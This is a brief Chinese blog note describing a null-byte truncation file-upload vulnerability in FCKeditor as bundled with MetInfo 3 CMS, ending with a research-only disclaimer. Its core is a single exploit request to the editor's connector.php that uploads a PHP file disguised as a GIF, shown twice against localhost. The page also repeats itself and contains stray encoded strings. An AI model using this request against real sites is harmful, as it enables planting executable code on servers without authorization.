【笔记】FCKeditor文件上传漏洞
前言
引用了FCKeditor的米拓CMS(Metinfo3)利用00截断实现文件上传漏洞
正文
1 | POST http://127.0.0.1:80/fckeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=x.php%00.gif |
57uv6Z6g55qE5Y2a5a6i
MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究,请勿非法破坏,请遵守相关法律法规,后果自负
引用了FCKeditor的米拓CMS(Metinfo3)利用00截断实现文件上传漏洞
1 | POST http://127.0.0.1:80/fckeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=x.php%00.gif |